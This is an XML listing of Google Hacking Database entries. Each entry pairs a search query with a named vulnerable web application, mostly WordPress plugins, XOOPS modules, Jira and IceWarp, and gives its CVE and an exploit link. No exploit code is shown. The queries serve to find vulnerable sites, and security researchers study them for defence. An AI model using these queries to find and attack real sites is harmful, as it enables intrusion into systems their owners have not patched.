<entry>
<id>3238</id>
<link>https://www.exploit-db.com/ghdb/3238</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/tinyevent/</shortDescription>
<textualDescription>XOOPS Module Tiny Event 1.01 (id) Remote SQL Injection - CVE: 2007-1811: https://www.exploit-db.com/exploits/3625</textualDescription>
<query>inurl:/modules/tinyevent/</query>
<querystring>https://www.google.com/search?q=inurl:/modules/tinyevent/</querystring>
<edb>https://www.exploit-db.com/exploits/3625</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3283</id>
<link>https://www.exploit-db.com/ghdb/3283</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/wflinks</shortDescription>
<textualDescription>XOOPS Module WF-Links 1.03 (cid) Remote SQL Injection - CVE: 2007-2373: https://www.exploit-db.com/exploits/3670</textualDescription>
<query>inurl:/modules/wflinks</query>
<querystring>https://www.google.com/search?q=inurl:/modules/wflinks</querystring>
<edb>https://www.exploit-db.com/exploits/3670</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3529</id>
<link>https://www.exploit-db.com/ghdb/3529</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/modules/xfsection/</shortDescription>
<textualDescription>XOOPS Module XFsection 1.07 (articleid) BLIND SQL Injection - CVE: 2005-0725: https://www.exploit-db.com/exploits/3645</textualDescription>
<query>inurl:/modules/xfsection/</query>
<querystring>https://www.google.com/search?q=inurl:/modules/xfsection/</querystring>
<edb>https://www.exploit-db.com/exploits/3645</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4155</id>
<link>https://www.exploit-db.com/ghdb/4155</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/node/add/event</shortDescription>
<textualDescription>Dorks For Drupal HTML&amp; Arbitrary File Upload Vulnerabilities
inurl:/node/add/event
inurl:/node/add/announcement
This Dork Original By Mr.XSecr3t :p
NO COPAS brooh :v
~GAME OVER~</textualDescription>
<query>inurl:/node/add/event</query>
<querystring>https://www.google.com/search?q=inurl:/node/add/event</querystring>
<edb></edb>
<date>2015-12-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>1811</id>
<link>https://www.exploit-db.com/ghdb/1811</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/phpfootball/</shortDescription>
<textualDescription>PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability - CVE: 2007-0638: https://www.exploit-db.com/exploits/3226</textualDescription>
<query>inurl:/phpfootball/</query>
<querystring>https://www.google.com/search?q=inurl:/phpfootball/</querystring>
<edb>https://www.exploit-db.com/exploits/3226</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3046</id>
<link>https://www.exploit-db.com/ghdb/3046</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/phpplanner/userinfo.php?userid=</shortDescription>
<textualDescription>phpplanner XSS / SQL Vulnerability: https://www.exploit-db.com/exploits/13847</textualDescription>
<query>inurl:/phpplanner/userinfo.php?userid=</query>
<querystring>https://www.google.com/search?q=inurl:/phpplanner/userinfo.php%3Fuserid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/13847</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4044</id>
<link>https://www.exploit-db.com/ghdb/4044</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/</shortDescription>
<textualDescription>www.exploit-db.com/exploits/37275/
Dork: inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/
sincerely,
Zeel Chavda</textualDescription>
<query>inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/</query>
<querystring>https://www.google.com/search?q=inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/</querystring>
<edb>https://www.exploit-db.com/exploits/37275</edb>
<date>2015-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6740</id>
<link>https://www.exploit-db.com/ghdb/6740</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/pro_users/login</shortDescription>
<textualDescription># Google Dork: inurl:/pro_users/login
# Spiceworks 7.5 - HTTP Header Injection. CVE : CVE-2020-25901.
# https://www.exploit-db.com/exploits/49299
# Date: 21/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/pro_users/login</query>
<querystring>https://www.google.com/search?q=inurl:/pro_users/login</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5283</id>
<link>https://www.exploit-db.com/ghdb/5283</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/secure/ContactAdministrators!default.jspa intext:&quot;Request Details&quot; -intext:&quot;Your Jira administrator has not yet configured this contact form&quot;</shortDescription>
<textualDescription>Dork: inurl:/secure/ContactAdministrators!default.jspa intext:&quot;Request
Details&quot; -intext:&quot;Your Jira administrator has not yet configured this
contact form&quot;
Category : Vulnerable Servers
Summary:
A Google dork that gives the information about Jira servers that may
vulnerable to Template injection vulnerability [CVE-2019-11581].
*Dork discovered by:* *Sachin Wagh (@tiger_tigerboy)*
Reference:
https://twitter.com/tiger_tigerboy/status/1151011237414629376
</textualDescription>
<query>inurl:/secure/ContactAdministrators!default.jspa intext:&quot;Request Details&quot; -intext:&quot;Your Jira administrator has not yet configured this contact form&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/secure/ContactAdministrators!default.jspa intext:&quot;Request Details&quot; -intext:&quot;Your Jira administrator has not yet configured this contact form&quot;</querystring>
<edb></edb>
<date>2019-07-16</date>
<author>Sachin Wagh</author>
</entry>
<entry>
<id>689</id>
<link>https://www.exploit-db.com/ghdb/689</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/SiteChassisManager/</shortDescription>
<textualDescription>Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.http://www.securityfocus.com/bid/11434/discussion/</textualDescription>
<query>inurl:/SiteChassisManager/</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3A%2FSiteChassisManager%2F+</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1546</id>
<link>https://www.exploit-db.com/ghdb/1546</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/squirrelcart/</shortDescription>
<textualDescription>Squirrelcart 2.2.0 (cart_content.php) Remote Inclusion Vulnerability - CVE: 2006-2483: https://www.exploit-db.com/exploits/1790</textualDescription>
<query>inurl:/squirrelcart/</query>
<querystring>https://www.google.com/search?q=inurl:/squirrelcart/</querystring>
<edb>https://www.exploit-db.com/exploits/1790</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1594</id>
<link>https://www.exploit-db.com/ghdb/1594</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/system/article/alltopics.php OR inurl:/system/user/index.php</shortDescription>
<textualDescription>OpenPHPNuke 2.3.3 Remote File Inclusion Vulnerability - CVE: 2006-2137: https://www.exploit-db.com/exploits/1727</textualDescription>
<query>inurl:/system/article/alltopics.php OR inurl:/system/user/index.php</query>
<querystring>https://www.google.com/search?q=inurl:/system/article/alltopics.php+OR+inurl:/system/user/index.php</querystring>
<edb>https://www.exploit-db.com/exploits/1727</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2227</id>
<link>https://www.exploit-db.com/ghdb/2227</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/tiny_mce/plugins/filemanager/</shortDescription>
<textualDescription>TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15194</textualDescription>
<query>inurl:/tiny_mce/plugins/filemanager/</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:/tiny_mce/plugins/filemanager/</querystring>
<edb>https://www.exploit-db.com/exploits/15194</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2282</id>
<link>https://www.exploit-db.com/ghdb/2282</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/webCal3_detail.asp?event_id=</shortDescription>
<textualDescription>WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability - CVE: 2009-1945: https://www.exploit-db.com/exploits/8857</textualDescription>
<query>inurl:/webCal3_detail.asp?event_id=</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:/webCal3_detail.asp%3Fevent_id%3D</querystring>
<edb>https://www.exploit-db.com/exploits/8857</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6323</id>
<link>https://www.exploit-db.com/ghdb/6323</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/webmail intext:Tecnologia fornecida por IceWarp Server</shortDescription>
<textualDescription># Google Dork: inurl:/webmail intext:Tecnologia fornecida por IceWarp Server
# IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site Scripting.
# This dork is linked to the following existing exploit:
# https://www.exploit-db.com/exploits/47988
[*] CVE: CVE-2020-8512
[*] Date: 23/06/2020
[*] Author: Vanshal Gaur
[*] Twitter: VanshalG
</textualDescription>
<query>inurl:/webmail intext:Tecnologia fornecida por IceWarp Server</query>
<querystring>https://www.google.com/search?q=inurl:/webmail intext:Tecnologia fornecida por IceWarp Server</querystring>
<edb></edb>
<date>2020-06-23</date>
<author>Vanshal Gaur</author>
</entry>
<entry>
<id>5998</id>
<link>https://www.exploit-db.com/ghdb/5998</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/webmail/ intext:Powered by IceWarp Server</shortDescription>
<textualDescription># Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
# IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/47988
# Date: 2/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:/webmail/ intext:Powered by IceWarp Server</query>
<querystring>https://www.google.com/search?q=inurl:/webmail/ intext:Powered by IceWarp Server</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3407</id>
<link>https://www.exploit-db.com/ghdb/3407</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/webquest/soporte_derecha_w.php?</shortDescription>
<textualDescription>PHP Webquest 2.5 (id_actividad) Remote SQL Injection - CVE: 2007-4920: https://www.exploit-db.com/exploits/4407</textualDescription>
<query>inurl:/webquest/soporte_derecha_w.php?</query>
<querystring>https://www.google.com/search?q=inurl:/webquest/soporte_derecha_w.php%3F</querystring>
<edb>https://www.exploit-db.com/exploits/4407</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4008</id>
<link>https://www.exploit-db.com/ghdb/4008</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action</shortDescription>
<textualDescription>This dork finds vulnerabel revslider plugins.
In reference to the exploit submitted by Adrián M. F.
https://www.exploit-db.com/exploits/37067/
Author:NickiK.</textualDescription>
<query>inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action</query>
<querystring>https://www.google.com/search?q=inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action</querystring>
<edb>https://www.exploit-db.com/exploits/37067</edb>
<date>2015-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4010</id>
<link>https://www.exploit-db.com/ghdb/4010</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-admin/post.php?post=</shortDescription>
<textualDescription>This dork finds websites which could be exploitable using Adrián M. F.
landing page exploit - https://www.exploit-db.com/exploits/37108/
Author:NickiK.</textualDescription>
<query>inurl:/wp-admin/post.php?post=</query>
<querystring>https://www.google.com/search?q=inurl:/wp-admin/post.php?post=</querystring>
<edb>https://www.exploit-db.com/exploits/37108</edb>
<date>2015-05-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6409</id>
<link>https://www.exploit-db.com/ghdb/6409</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/plugins/angwp</shortDescription>
<textualDescription>Google Dork: inurl:/wp-content/plugins/angwp
This google dork lists out Advisories and Vulnerabilities regarding Adning
Advertising plugin.
Ref: https://wpvulndb.com/vulnerabilities/10293
Adning Advertising &lt; 1.5.6 - Unauthenticated Arbitrary File Upload/Deletion
Author: Ritik Kumar Jain (Dasagreeva)
LinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/
Twitter: https://twitter.com/Dasagreeva1
</textualDescription>
<query>inurl:/wp-content/plugins/angwp</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/angwp</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Ritik Kumar Jain</author>
</entry>
<entry>
<id>3019</id>
<link>https://www.exploit-db.com/ghdb/3019</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/plugins/fgallery/</shortDescription>
<textualDescription>Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability - CVE: 2008-0491: https://www.exploit-db.com/exploits/4993</textualDescription>
<query>inurl:/wp-content/plugins/fgallery/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/fgallery/</querystring>
<edb>https://www.exploit-db.com/exploits/4993</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4045</id>
<link>https://www.exploit-db.com/ghdb/4045</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/plugins/inboundio-marketing/</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/36478/
Google Dork : inurl:/wp-content/plugins/inboundio-marketing/
sincerely,
Zeel Chavda</textualDescription>
<query>inurl:/wp-content/plugins/inboundio-marketing/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/inboundio-marketing/</querystring>
<edb>https://www.exploit-db.com/exploits/36478</edb>
<date>2015-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6202</id>
<link>https://www.exploit-db.com/ghdb/6202</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/plugins/wp-ecommerce-shop-styling/</shortDescription>
<textualDescription>Dork: inurl:/wp-content/plugins/wp-ecommerce-shop-styling/
Description: This google dork lists out Advisories and Vulnerabilities
regarding the WP e-Commerce Shop Styling wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/8079
Author: Akash Solanki (MAALP)
</textualDescription>
<query>inurl:/wp-content/plugins/wp-ecommerce-shop-styling/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/wp-ecommerce-shop-styling/</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Akash Solanki</author>
</entry>
<entry>
<id>6609</id>
<link>https://www.exploit-db.com/ghdb/6609</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/plugins/wp-file-manager/readme.txt</shortDescription>
<textualDescription>Dork to find CVE-202025213
&quot; inurl:/wp-content/plugins/wp-file-manager/readme.txt &quot;
Best Regards,
Kathan
</textualDescription>
<query>inurl:/wp-content/plugins/wp-file-manager/readme.txt</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/wp-file-manager/readme.txt</querystring>
<edb></edb>
<date>2020-10-13</date>
<author>Kathan Patel</author>
</entry>
<entry>
<id>7000</id>
<link>https://www.exploit-db.com/ghdb/7000</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/plugins/wpdiscuz/</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/plugins/wpdiscuz/
# Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload
# (Unauthenticated). CVE : CVE-2020-24186.
# https://www.exploit-db.com/exploits/49962
# Date: 7/6/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/wp-content/plugins/wpdiscuz/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/wpdiscuz/</querystring>
<edb></edb>
<date>2021-06-09</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2123</id>
<link>https://www.exploit-db.com/ghdb/2123</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/plugins/wpSS/</shortDescription>
<textualDescription>Wordpress Plugin Spreadsheet 0.6 SQL Injection Vulnerability - CVE: 2008-1982: https://www.exploit-db.com/exploits/5486</textualDescription>
<query>inurl:/wp-content/plugins/wpSS/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/wpSS/</querystring>
<edb>https://www.exploit-db.com/exploits/5486</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6733</id>
<link>https://www.exploit-db.com/ghdb/6733</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/themes/altair/</shortDescription>
<textualDescription># Google Dork : inurl:/wp-content/themes/altair/
# Shows Altair WordPress theme v4.8 - Unauthenticated Reflected XSS
# Author : ANURAG K P
</textualDescription>
<query>inurl:/wp-content/themes/altair/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/altair/</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>ANURAG K P</author>
</entry>
<entry>
<id>5997</id>
<link>https://www.exploit-db.com/ghdb/5997</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/themes/CherryFramework</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/themes/CherryFramework
# Wordpress CherryFramework Themes 3.1.4 - Backup File Download. This dork
is linked to the following existing exploit:
https://www.exploit-db.com/exploits/45896
# Date: 2/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:/wp-content/themes/CherryFramework</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/CherryFramework</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6028</id>
<link>https://www.exploit-db.com/ghdb/6028</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/themes/fruitful/</shortDescription>
<textualDescription>Dork: inurl:/wp-content/themes/fruitful/
Description: This Google dork lists out Advisories and Vulnerabilities
about the fruitful theme. Ref: https://wpvulndb.com/vulnerabilities/10128
Author: Abhi Chitkara
</textualDescription>
<query>inurl:/wp-content/themes/fruitful/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/fruitful/</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6026</id>
<link>https://www.exploit-db.com/ghdb/6026</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/themes/listingpro/</shortDescription>
<textualDescription>Dork: inurl:/wp-content/themes/listingpro/
Description: This Google dork lists out Advisories and Vulnerabilities
about the listingpro theme. Ref:
https://wpvulndb.com/vulnerabilities/10025
Author: Abhi Chitkara
</textualDescription>
<query>inurl:/wp-content/themes/listingpro/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/listingpro/</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6408</id>
<link>https://www.exploit-db.com/ghdb/6408</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/themes/realestate-7</shortDescription>
<textualDescription>Dork : inurl:/wp-content/themes/realestate-7
Description : This google dork lists out Advisories and Vulnerabilities
regarding the realestate-7 wordpress theme.
Ref: https://wpvulndb.com/vulnerabilities/10024 ,
https://wpvulndb.com/vulnerabilities/9492
Real Estate 7 &lt; 2.9.5 - Multiple Vulnerabilities
Real Estate 7 </textualDescription>
<query>inurl:/wp-content/themes/realestate-7</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/realestate-7</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Jose Praveen</author>
</entry>
<entry>
<id>6027</id>
<link>https://www.exploit-db.com/ghdb/6027</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/wp-content/themes/traveler/</shortDescription>
<textualDescription>Dork: inurl:/wp-content/themes/traveler/
Description: This Google dork lists out Advisories and Vulnerabilities
about the traveler theme. Ref: https://wpvulndb.com/vulnerabilities/10023
Author: Abhi Chitkara
</textualDescription>
<query>inurl:/wp-content/themes/traveler/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/themes/traveler/</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>2503</id>
<link>https://www.exploit-db.com/ghdb/2503</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/_blogadata/</shortDescription>
<textualDescription>Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability - CVE: 2008-1763: https://www.exploit-db.com/exploits/5368</textualDescription>
<query>inurl:/_blogadata/</query>
<querystring>https://www.google.com/search?q=inurl:/_blogadata/</querystring>
<edb>https://www.exploit-db.com/exploits/5368</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2738</id>
<link>https://www.exploit-db.com/ghdb/2738</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:/_blogadata/</shortDescription>
<textualDescription>Blogator-script 0.95 Change User Password Vulnerability - CVE: 2008-6473: https://www.exploit-db.com/exploits/5370</textualDescription>
<query>inurl:/_blogadata/</query>
<querystring>https://www.google.com/search?q=inurl:/_blogadata/</querystring>
<edb>https://www.exploit-db.com/exploits/5370</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1978</id>
<link>https://www.exploit-db.com/ghdb/1978</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:acrotxt.php wbb</shortDescription>
<textualDescription>WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability - CVE: 2007-4581: https://www.exploit-db.com/exploits/4327</textualDescription>
<query>inurl:acrotxt.php wbb</query>
<querystring>https://www.google.com/search?q=inurl:acrotxt.php+wbb</querystring>
<edb>https://www.exploit-db.com/exploits/4327</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2795</id>
<link>https://www.exploit-db.com/ghdb/2795</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:add_soft.php</shortDescription>
<textualDescription>Hotscripts Clone (cid) Remote SQL Injection Vulnerability - CVE: 2008-6405: https://www.exploit-db.com/exploits/6545</textualDescription>
<query>inurl:add_soft.php</query>
<querystring>https://www.google.com/search?q=inurl:add_soft.php</querystring>
<edb>https://www.exploit-db.com/exploits/6545</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2453</id>
<link>https://www.exploit-db.com/ghdb/2453</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:apages.php</shortDescription>
<textualDescription>Arab Network Tech. (ANT) CMS SQL Injection: https://www.exploit-db.com/exploits/11339</textualDescription>
<query>inurl:apages.php</query>
<querystring>https://www.google.com/search?q=inurl:apages.php</querystring>
<edb>https://www.exploit-db.com/exploits/11339</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1553</id>
<link>https://www.exploit-db.com/ghdb/1553</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:bemarket</shortDescription>
<textualDescription>BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability - CVE: 2007-3934: https://www.exploit-db.com/exploits/4195</textualDescription>
<query>inurl:bemarket</query>
<querystring>https://www.google.com/search?q=inurl:bemarket</querystring>
<edb>https://www.exploit-db.com/exploits/4195</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2648</id>
<link>https://www.exploit-db.com/ghdb/2648</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:browsecats.php?cid=</shortDescription>
<textualDescription>PozScripts Classified Ads Script (cid) SQL Injection Vulnerability - CVE: 2008-3672: https://www.exploit-db.com/exploits/6169</textualDescription>
<query>inurl:browsecats.php?cid=</query>
<querystring>https://www.google.com/search?q=inurl:browsecats.php%3Fcid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6169</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1540</id>
<link>https://www.exploit-db.com/ghdb/1540</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:btg_oglas</shortDescription>
<textualDescription>Joomla Component (btg_oglas) HTML &amp; XSS Injection Vulnerability: https://www.exploit-db.com/exploits/15468</textualDescription>
<query>inurl:btg_oglas</query>
<querystring>https://www.google.com/search?q=inurl:btg_oglas</querystring>
<edb>https://www.exploit-db.com/exploits/15468</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1685</id>
<link>https://www.exploit-db.com/ghdb/1685</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:buyer/about_us.php?BuyerID</shortDescription>
<textualDescription>Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12612</textualDescription>
<query>inurl:buyer/about_us.php?BuyerID</query>
<querystring>https://www.google.com/search?q=inurl:buyer/about_us.php%3FBuyerID</querystring>
<edb>https://www.exploit-db.com/exploits/12612</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2583</id>
<link>https://www.exploit-db.com/ghdb/2583</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:cal_cat.php?op=</shortDescription>
<textualDescription>Calendarix (cal_cat.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14393</textualDescription>
<query>inurl:cal_cat.php?op=</query>
<querystring>https://www.google.com/search?q=inurl:cal_cat.php%3Fop%3D</querystring>
<edb>https://www.exploit-db.com/exploits/14393</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>694</id>
<link>https://www.exploit-db.com/ghdb/694</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:cal_make.pl</shortDescription>
<textualDescription>A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory. http://www.securityfocus.com/bid/2663</textualDescription>
<query>inurl:cal_make.pl</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3Acal_make.pl</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>2534</id>
<link>https://www.exploit-db.com/ghdb/2534</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:cart.php?m=features&amp;id=</shortDescription>
<textualDescription>digiSHOP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15405</textualDescription>
<query>inurl:cart.php?m=features&amp;id=</query>
<querystring>https://www.google.com/search?q=inurl:cart.php%3Fm%3Dfeatures%26id%3D</querystring>
<edb>https://www.exploit-db.com/exploits/15405</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1505</id>
<link>https://www.exploit-db.com/ghdb/1505</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:cat1.php?catID= &quot;Spaceacre&quot;</shortDescription>
<textualDescription>Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability: https://www.exploit-db.com/exploits/12756</textualDescription>
<query>inurl:cat1.php?catID= &quot;Spaceacre&quot;</query>
<querystring>https://www.google.com/search?q=inurl:cat1.php%3FcatID%3D+%22Spaceacre%22</querystring>
<edb>https://www.exploit-db.com/exploits/12756</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2041</id>
<link>https://www.exploit-db.com/ghdb/2041</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:categoria.php?ID= comune</shortDescription>
<textualDescription>Prometeo v1.0.65 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14806</textualDescription>
<query>inurl:categoria.php?ID= comune</query>
<querystring>https://www.google.com/search?q=inurl:categoria.php%3FID%3D+comune</querystring>
<edb>https://www.exploit-db.com/exploits/14806</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2691</id>
<link>https://www.exploit-db.com/ghdb/2691</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:category.php?cate_id=</shortDescription>
<textualDescription>GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability - CVE: 2008-3413: https://www.exploit-db.com/exploits/6144</textualDescription>
<query>inurl:category.php?cate_id=</query>
<querystring>https://www.google.com/search?q=inurl:category.php%3Fcate_id%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6144</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1492</id>
<link>https://www.exploit-db.com/ghdb/1492</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:cfaq/index.php?catid=</shortDescription>
<textualDescription>FAQ Management Script (catid) Remote SQL Injection Vulnerability - CVE: 2008-4743: https://www.exploit-db.com/exploits/6629</textualDescription>
<query>inurl:cfaq/index.php?catid=</query>
<querystring>https://www.google.com/search?q=inurl:cfaq/index.php%3Fcatid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6629</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4101</id>
<link>https://www.exploit-db.com/ghdb/4101</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:cgi-bin/webproc?getpage=</shortDescription>
<textualDescription>inurl:cgi-bin/webproc?getpage=
https://www.exploit-db.com/exploits/38488/
By JeJe Plus</textualDescription>
<query>inurl:cgi-bin/webproc?getpage=</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin/webproc?getpage=</querystring>
